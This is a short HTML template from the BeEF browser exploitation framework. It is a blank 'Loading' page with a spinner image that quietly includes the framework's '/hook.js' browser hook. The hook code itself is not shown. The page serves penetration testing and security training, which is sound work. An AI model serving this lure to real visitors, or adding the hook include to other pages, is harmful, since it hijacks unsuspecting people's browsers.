16 lines
415 B
HTML
16 lines
415 B
HTML
<!--
|
|
Copyright (c) 2006-2025 Wade Alcorn - wade@bindshell.net
|
|
Browser Exploitation Framework (BeEF) - https://beefproject.com
|
|
See the file 'doc/COPYING' for copying permission
|
|
-->
|
|
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
|
|
<html><head>
|
|
<title>Loading</title>
|
|
<script src="/hook.js"></script>
|
|
</head><body>
|
|
<br/>
|
|
<br/>
|
|
<br/>
|
|
<div align="middle"><img src="ajax-loader.gif" /></div>
|
|
</body></html>
|